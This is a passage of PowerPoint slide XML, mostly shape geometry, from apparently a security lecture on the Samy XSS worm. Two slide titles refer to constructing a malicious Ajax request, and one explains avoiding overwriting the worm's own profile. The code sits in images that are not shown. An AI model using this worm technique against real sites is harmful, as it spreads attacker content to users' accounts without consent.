                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14C7A175-39F4-4ABA-AADE-5972F6FE39F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId93"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2051050" y="1897063"/>
              <a:ext cx="90488" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 160 w 237"/>
                <a:gd name="T1" fmla="*/ 280 h 308"/>
                <a:gd name="T2" fmla="*/ 180 w 237"/>
                <a:gd name="T3" fmla="*/ 305 h 308"/>
                <a:gd name="T4" fmla="*/ 217 w 237"/>
                <a:gd name="T5" fmla="*/ 305 h 308"/>
                <a:gd name="T6" fmla="*/ 237 w 237"/>
                <a:gd name="T7" fmla="*/ 289 h 308"/>
                <a:gd name="T8" fmla="*/ 217 w 237"/>
                <a:gd name="T9" fmla="*/ 274 h 308"/>
                <a:gd name="T10" fmla="*/ 195 w 237"/>
                <a:gd name="T11" fmla="*/ 274 h 308"/>
                <a:gd name="T12" fmla="*/ 195 w 237"/>
                <a:gd name="T13" fmla="*/ 20 h 308"/>
                <a:gd name="T14" fmla="*/ 175 w 237"/>
                <a:gd name="T15" fmla="*/ 0 h 308"/>
                <a:gd name="T16" fmla="*/ 139 w 237"/>
                <a:gd name="T17" fmla="*/ 0 h 308"/>
                <a:gd name="T18" fmla="*/ 118 w 237"/>
                <a:gd name="T19" fmla="*/ 15 h 308"/>
                <a:gd name="T20" fmla="*/ 138 w 237"/>
                <a:gd name="T21" fmla="*/ 30 h 308"/>
                <a:gd name="T22" fmla="*/ 160 w 237"/>
                <a:gd name="T23" fmla="*/ 30 h 308"/>
                <a:gd name="T24" fmla="*/ 160 w 237"/>
                <a:gd name="T25" fmla="*/ 109 h 308"/>
                <a:gd name="T26" fmla="*/ 102 w 237"/>
                <a:gd name="T27" fmla="*/ 87 h 308"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 197 h 308"/>
                <a:gd name="T30" fmla="*/ 98 w 237"/>
                <a:gd name="T31" fmla="*/ 308 h 308"/>
                <a:gd name="T32" fmla="*/ 160 w 237"/>
                <a:gd name="T33" fmla="*/ 280 h 308"/>
                <a:gd name="T34" fmla="*/ 160 w 237"/>
                <a:gd name="T35" fmla="*/ 173 h 308"/>
                <a:gd name="T36" fmla="*/ 160 w 237"/>
                <a:gd name="T37" fmla="*/ 208 h 308"/>
                <a:gd name="T38" fmla="*/ 100 w 237"/>
                <a:gd name="T39" fmla="*/ 277 h 308"/>
                <a:gd name="T40" fmla="*/ 34 w 237"/>
                <a:gd name="T41" fmla="*/ 197 h 308"/>
                <a:gd name="T42" fmla="*/ 104 w 237"/>
                <a:gd name="T43" fmla="*/ 117 h 308"/>
                <a:gd name="T44" fmla="*/ 160 w 237"/>
                <a:gd name="T45" fmla="*/ 173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7" h="308">
                  <a:moveTo>
                    <a:pt x="160" y="280"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="298"/>
                    <a:pt x="160" y="305"/>
                    <a:pt x="180" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="217" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="305"/>
                    <a:pt x="237" y="305"/>
                    <a:pt x="237" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="274"/>
                    <a:pt x="224" y="274"/>
                    <a:pt x="217" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="5"/>
                    <a:pt x="192" y="0"/>
                    <a:pt x="175" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="0"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="118" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="30"/>
                    <a:pt x="131" y="30"/>
                    <a:pt x="138" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="160" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="95"/>
                    <a:pt x="124" y="87"/>
                    <a:pt x="102" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="87"/>
                    <a:pt x="0" y="134"/>
                    <a:pt x="0" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="259"/>
                    <a:pt x="45" y="308"/>
                    <a:pt x="98" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="308"/>
                    <a:pt x="147" y="294"/>
                    <a:pt x="160" y="280"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="160" y="173"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="160" y="208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="236"/>
                    <a:pt x="138" y="277"/>
                    <a:pt x="100" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="277"/>
                    <a:pt x="34" y="242"/>
                    <a:pt x="34" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="150"/>
                    <a:pt x="69" y="117"/>
                    <a:pt x="104" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="117"/>
                    <a:pt x="160" y="145"/>
                    <a:pt x="160" y="17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07" name="Freeform 198">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00530414-57F6-4339-BD3C-396D777F68E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId94"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2151062" y="1935163"/>
              <a:ext cx="87313" cy="42863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 201 w 224"/>
                <a:gd name="T1" fmla="*/ 35 h 110"/>
                <a:gd name="T2" fmla="*/ 224 w 224"/>
                <a:gd name="T3" fmla="*/ 17 h 110"/>
                <a:gd name="T4" fmla="*/ 198 w 224"/>
                <a:gd name="T5" fmla="*/ 0 h 110"/>
                <a:gd name="T6" fmla="*/ 26 w 224"/>
                <a:gd name="T7" fmla="*/ 0 h 110"/>
                <a:gd name="T8" fmla="*/ 0 w 224"/>
                <a:gd name="T9" fmla="*/ 17 h 110"/>
                <a:gd name="T10" fmla="*/ 23 w 224"/>
                <a:gd name="T11" fmla="*/ 35 h 110"/>
                <a:gd name="T12" fmla="*/ 201 w 224"/>
                <a:gd name="T13" fmla="*/ 35 h 110"/>
                <a:gd name="T14" fmla="*/ 198 w 224"/>
                <a:gd name="T15" fmla="*/ 110 h 110"/>
                <a:gd name="T16" fmla="*/ 224 w 224"/>
                <a:gd name="T17" fmla="*/ 93 h 110"/>
                <a:gd name="T18" fmla="*/ 201 w 224"/>
                <a:gd name="T19" fmla="*/ 76 h 110"/>
                <a:gd name="T20" fmla="*/ 23 w 224"/>
                <a:gd name="T21" fmla="*/ 76 h 110"/>
                <a:gd name="T22" fmla="*/ 0 w 224"/>
                <a:gd name="T23" fmla="*/ 93 h 110"/>
                <a:gd name="T24" fmla="*/ 26 w 224"/>
                <a:gd name="T25" fmla="*/ 110 h 110"/>
                <a:gd name="T26" fmla="*/ 198 w 224"/>
                <a:gd name="T27"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4" h="110">
                  <a:moveTo>
                    <a:pt x="201" y="35"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="35"/>
                    <a:pt x="224" y="35"/>
                    <a:pt x="224" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="0"/>
                    <a:pt x="205" y="0"/>
                    <a:pt x="198" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="35"/>
                    <a:pt x="17" y="35"/>
                    <a:pt x="23" y="35"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="201" y="35"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="198" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="110"/>
                    <a:pt x="224" y="110"/>
                    <a:pt x="224" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="76"/>
                    <a:pt x="207" y="76"/>
                    <a:pt x="201" y="76"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="23" y="76"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="76"/>
                    <a:pt x="0" y="76"/>
                    <a:pt x="0" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="110"/>
                    <a:pt x="19" y="110"/>
                    <a:pt x="26" y="110"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="1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08" name="Freeform 199">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74036505-80BD-4061-93E8-12A3BBCF97D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId95"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2251075" y="1893888"/>
              <a:ext cx="88900" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5 w 233"/>
                <a:gd name="T1" fmla="*/ 189 h 311"/>
                <a:gd name="T2" fmla="*/ 0 w 233"/>
                <a:gd name="T3" fmla="*/ 206 h 311"/>
                <a:gd name="T4" fmla="*/ 20 w 233"/>
                <a:gd name="T5" fmla="*/ 226 h 311"/>
                <a:gd name="T6" fmla="*/ 146 w 233"/>
                <a:gd name="T7" fmla="*/ 226 h 311"/>
                <a:gd name="T8" fmla="*/ 146 w 233"/>
                <a:gd name="T9" fmla="*/ 280 h 311"/>
                <a:gd name="T10" fmla="*/ 115 w 233"/>
                <a:gd name="T11" fmla="*/ 280 h 311"/>
                <a:gd name="T12" fmla="*/ 95 w 233"/>
                <a:gd name="T13" fmla="*/ 296 h 311"/>
                <a:gd name="T14" fmla="*/ 115 w 233"/>
                <a:gd name="T15" fmla="*/ 311 h 311"/>
                <a:gd name="T16" fmla="*/ 205 w 233"/>
                <a:gd name="T17" fmla="*/ 311 h 311"/>
                <a:gd name="T18" fmla="*/ 225 w 233"/>
                <a:gd name="T19" fmla="*/ 296 h 311"/>
                <a:gd name="T20" fmla="*/ 205 w 233"/>
                <a:gd name="T21" fmla="*/ 280 h 311"/>
                <a:gd name="T22" fmla="*/ 174 w 233"/>
                <a:gd name="T23" fmla="*/ 280 h 311"/>
                <a:gd name="T24" fmla="*/ 174 w 233"/>
                <a:gd name="T25" fmla="*/ 226 h 311"/>
                <a:gd name="T26" fmla="*/ 213 w 233"/>
                <a:gd name="T27" fmla="*/ 226 h 311"/>
                <a:gd name="T28" fmla="*/ 233 w 233"/>
                <a:gd name="T29" fmla="*/ 211 h 311"/>
                <a:gd name="T30" fmla="*/ 213 w 233"/>
                <a:gd name="T31" fmla="*/ 196 h 311"/>
                <a:gd name="T32" fmla="*/ 174 w 233"/>
                <a:gd name="T33" fmla="*/ 196 h 311"/>
                <a:gd name="T34" fmla="*/ 174 w 233"/>
                <a:gd name="T35" fmla="*/ 20 h 311"/>
                <a:gd name="T36" fmla="*/ 154 w 233"/>
                <a:gd name="T37" fmla="*/ 0 h 311"/>
                <a:gd name="T38" fmla="*/ 140 w 233"/>
                <a:gd name="T39" fmla="*/ 0 h 311"/>
                <a:gd name="T40" fmla="*/ 119 w 233"/>
                <a:gd name="T41" fmla="*/ 10 h 311"/>
                <a:gd name="T42" fmla="*/ 5 w 233"/>
                <a:gd name="T43" fmla="*/ 189 h 311"/>
                <a:gd name="T44" fmla="*/ 35 w 233"/>
                <a:gd name="T45" fmla="*/ 196 h 311"/>
                <a:gd name="T46" fmla="*/ 146 w 233"/>
                <a:gd name="T47" fmla="*/ 22 h 311"/>
                <a:gd name="T48" fmla="*/ 146 w 233"/>
                <a:gd name="T49" fmla="*/ 196 h 311"/>
                <a:gd name="T50" fmla="*/ 35 w 233"/>
                <a:gd name="T51" fmla="*/ 19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3" h="311">
                  <a:moveTo>
                    <a:pt x="5" y="189"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="195"/>
                    <a:pt x="0" y="196"/>
                    <a:pt x="0" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="223"/>
                    <a:pt x="5" y="226"/>
                    <a:pt x="20" y="226"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="146" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="280"/>
                    <a:pt x="95" y="280"/>
                    <a:pt x="95" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="311"/>
                    <a:pt x="108" y="311"/>
                    <a:pt x="115" y="311"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="205" y="311"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="311"/>
                    <a:pt x="225" y="311"/>
                    <a:pt x="225" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="280"/>
                    <a:pt x="213" y="280"/>
                    <a:pt x="205" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="174" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="226"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="226"/>
                    <a:pt x="233" y="226"/>
                    <a:pt x="233" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="196"/>
                    <a:pt x="221" y="196"/>
                    <a:pt x="213" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="174" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="4"/>
                    <a:pt x="171" y="0"/>
                    <a:pt x="154" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="140" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="0"/>
                    <a:pt x="125" y="0"/>
                    <a:pt x="119" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5" y="189"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="35" y="196"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="146" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="196"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="209" name="Freeform 200">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{461939A9-81E7-4D6B-ACF5-DEACF41DC6A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId96"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2354262" y="1893888"/>
              <a:ext cx="84138" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 167 w 218"/>
                <a:gd name="T1" fmla="*/ 38 h 318"/>
                <a:gd name="T2" fmla="*/ 63 w 218"/>
                <a:gd name="T3" fmla="*/ 295 h 318"/>
                <a:gd name="T4" fmla="*/ 81 w 218"/>
                <a:gd name="T5" fmla="*/ 318 h 318"/>
                <a:gd name="T6" fmla="*/ 98 w 218"/>
                <a:gd name="T7" fmla="*/ 298 h 318"/>
                <a:gd name="T8" fmla="*/ 207 w 218"/>
                <a:gd name="T9" fmla="*/ 40 h 318"/>
                <a:gd name="T10" fmla="*/ 218 w 218"/>
                <a:gd name="T11" fmla="*/ 23 h 318"/>
                <a:gd name="T12" fmla="*/ 198 w 218"/>
                <a:gd name="T13" fmla="*/ 8 h 318"/>
                <a:gd name="T14" fmla="*/ 33 w 218"/>
                <a:gd name="T15" fmla="*/ 8 h 318"/>
                <a:gd name="T16" fmla="*/ 17 w 218"/>
                <a:gd name="T17" fmla="*/ 0 h 318"/>
                <a:gd name="T18" fmla="*/ 0 w 218"/>
                <a:gd name="T19" fmla="*/ 20 h 318"/>
                <a:gd name="T20" fmla="*/ 0 w 218"/>
                <a:gd name="T21" fmla="*/ 41 h 318"/>
                <a:gd name="T22" fmla="*/ 17 w 218"/>
                <a:gd name="T23" fmla="*/ 62 h 318"/>
                <a:gd name="T24" fmla="*/ 35 w 218"/>
                <a:gd name="T25" fmla="*/ 38 h 318"/>
                <a:gd name="T26" fmla="*/ 167 w 218"/>
                <a:gd name="T27" fmla="*/ 3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8" h="318">
                  <a:moveTo>
                    <a:pt x="167" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="130"/>
                    <a:pt x="63" y="240"/>
                    <a:pt x="63" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="302"/>
                    <a:pt x="63" y="318"/>
                    <a:pt x="81" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="318"/>
                    <a:pt x="98" y="313"/>
                    <a:pt x="98" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="157"/>
                    <a:pt x="177" y="70"/>
                    <a:pt x="207" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="31"/>
                    <a:pt x="218" y="30"/>
                    <a:pt x="218" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="8"/>
                    <a:pt x="206" y="8"/>
                    <a:pt x="198" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="33" y="8"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="17" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="51"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="17" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="62"/>
                    <a:pt x="35" y="52"/>
                    <a:pt x="35" y="38"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="3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NZ"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="TextBox 311">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CCBBA13-E528-479D-A1A8-20A002C70106}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8298366" y="1874893"/>
            <a:ext cx="398463" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0"/>
              <a:t>⑥</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="1000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1625382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9B24-5425-4324-B1BD-68E8A5368028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Construct the malicious Ajax request</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF2DD474-1615-4557-850A-86992A74F8FB}"/>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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DB66E64-F1F4-4413-9D9A-582C88E6E8A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="420834" y="1243263"/>
            <a:ext cx="8302332" cy="2775284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4138475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7315-A957-4498-964C-4F8146A20E7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Construct the malicious Ajax request (cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B52B592-EF0A-4158-AFFD-F44E6F5390DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To ensure that it does not modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> own profile or it will overwrite the malicious content in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Samy’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> profile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B3FE33C-C5C2-4D1C-A623-89050BF09B14}"/>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B08D1CB-1581-442C-9E4B-4560DE6A84C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1418402" y="2344296"/>
            <a:ext cx="6325483" cy="2286319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CCFFBAC-9D8F-4B64-AFBA-55EB4DCAF860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5053263" y="1852863"/>
            <a:ext cx="1130969" cy="56147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01BD4F13-DF2A-4F51-BB52-CC1A7A250F71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7327135" y="2414337"/>
            <a:ext cx="398463" cy="253083"/>
          </a:xfrm>
